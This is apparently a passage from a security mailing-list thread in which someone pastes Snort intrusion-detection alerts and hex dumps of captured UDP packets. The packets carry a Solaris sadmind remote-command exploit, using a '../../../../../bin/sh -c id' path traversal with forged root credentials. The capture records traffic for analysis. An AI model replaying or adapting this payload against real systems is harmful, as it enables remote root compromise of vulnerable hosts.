120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33328) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16659 flags=0 offset=0 TTL=49 chksum=13366
UDP: port=60738 -> dport: 32778 len=1456
Payload: length = 1448
000 : 90 4B 10 2A 00 00 00 00 00 00 00 02 00 01 87 88 .K.*............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33329) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16677 flags=0 offset=0 TTL=49 chksum=13348
UDP: port=60738 -> dport: 32779 len=1456
Payload: length = 1448
000 : 9B BE 2D 4F 00 00 00 00 00 00 00 02 00 01 87 88 ..-O............
010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................
020 : 40 D7 86 9C 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit.
030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
040 : 00 00 00 00 40 D7 86 A0 00 07 45 DF 00 00 00 00 ....@.....E.....
050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................
070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ...............
080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ...............
090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................
0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit.....
0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system......
100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b
110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh...........
120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION..
130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................
140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG
150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C...
160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_
170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID.......
180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101
190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1.......
1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS
1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S...............
1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system..........
1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE
1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS..............
1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1.............
200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD......
210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../..
220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh...
230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_
240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...;
250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit.........
260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST.........
2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit.....
2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE
2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN.......
2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_
300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS...........
310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20
320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30.
330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_
340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE...........
350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X...
360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c..
370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y...
380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id..
390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
Current thread:
- Suspicious Traffic ISP Toolz (Jun 24)
- Re: Suspicious Traffic Matt Kettler (Jun 25)